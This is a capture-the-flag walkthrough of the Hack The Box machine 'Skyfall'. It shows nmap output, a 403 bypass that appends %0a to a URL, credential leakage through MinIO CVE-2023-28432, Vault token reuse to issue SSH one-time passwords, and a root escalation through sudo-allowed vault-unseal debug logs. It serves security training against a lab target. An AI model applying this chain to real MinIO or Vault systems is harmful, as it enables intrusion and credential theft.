Skyfall

Hack The Box

Recon

Let's start with a nmap scan.

┌──(kali㉿kali)-[~]
└─$ nmap -p- -T4 skyfall.htb                
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-09 07:29 BST
Nmap scan report for skyfall.htb (10.10.11.254)
Host is up (0.041s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 11.01 seconds
                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ nmap -p 22,80 -sC -sV -T4 skyfall.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-09 07:31 BST
Nmap scan report for skyfall.htb (10.10.11.254)
Host is up (0.040s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 65:70:f7:12:47:07:3a:88:8e:27:e9:cb:44:5d:10:fb (ECDSA)
|_  256 74:48:33:07:b7:88:9d:32:0e:3b:ec:16:aa:b4:c8:fe (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Skyfall - Introducing Sky Storage!
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds

Let's visit the website. It look a cloud storage service. We are also able to find a team section and 3 email IDs.

Directory enumeration uncovered multiple image assets, which are not deemed valuable. Subsequently, subdomain enumeration using ffuf revealed the presence of a subdomain named demo.skyfall.htb. Let's explore this subdomain to gather additional information.

Initial Access

We have a login page with demo login details: guest:guest.

On the left panel, there is an entry labeled "Min10 Metrics." However, attempting to access Min10 Metrics directly results in a 403 forbidden error. This access restriction can be circumvented by appending %0a at the end of the URL.

We can see a URL at the endpoint.

http://prd23-s3-backend.skyfall.htb/minio/v2/metrics/cluster

MinIO is reported to have the CVE-2023-28432 vulnerability, which entails an information leak risk. Exploiting this vulnerability can result in the exposure of sensitive information.

We can use this github link to exploit this vulnerability:

GitHub - acheiii/CVE-2023-28432: CVE-2023-28432 POCGitHub

We've obtained:

"MINIO_ROOT_USER": "5Gr*****************"
"MINIO_ROOT_PASSWORD": "Gkp*****************"

To install the Min10 client follow the steps at:

MinIO Client — MinIO Object Storage for Linux

Now let’s execute the Min10 client.

mc alias set myminio http://prd23-s3-backend.skyfall.htb/ 5Gr***************** Gkp*****************

Let’s check for files.

mc ls -r --versions myminio

Here we can find some backup files with the .gz extension. Let's download those files and decompress them.

Upon further enumeration of files with the .gz extension, we found these.

export VAULT_API_ADDR="http://prd23-vault-internal.skyfall.htb/"
export VAULT_TOKEN="hvs.*****************************************"

To install Vault we have to Download the Vault Binary First.

Install | Vault | HashiCorp DeveloperInstall | Vault | HashiCorp Developer

Add “prd23-vault-internal.skyfall.htb” to the /etc/hosts file. Then, run the command as follows:

export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb/" export VAULT_TOKEN="hvs.**************************************************"

We can log in now.

When we list the SSH roles, we see different roles, but for now we can only access dev_otp_key_role.

To obtain user access, execute the following code. An OTP will be generated, and use the OTP as the password for the SSH connection:

./vault ssh -role dev_otp_key_role -mode otp askyy@10.10.11.254

We've got our first flag.

Privilege Escalation

askyy@skyfall:~$ sudo -l
Matching Defaults entries for askyy on skyfall:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User askyy may run the following commands on skyfall:
    (ALL : ALL) NOPASSWD: /root/vault/vault-unseal ^-c /etc/vault-unseal.yaml -[vhd]+$
    (ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml

Upon executing the following command, we observe the creation of a debug.log file.

Upon inspecting the debug.log file, we discover an additional Vault Token.

Next, we must substitute the Vault Token with a fresh one.

export VAULT_TOKEN=hvs.I0e*********************

Once the role has been configured as admin_otp_key_role, we gain access to log in as root.

vault ssh -role admin_otp_key_role -mode OTP -strict-host-key-checking=no root@10.10.11.254

We are root and have our root flag.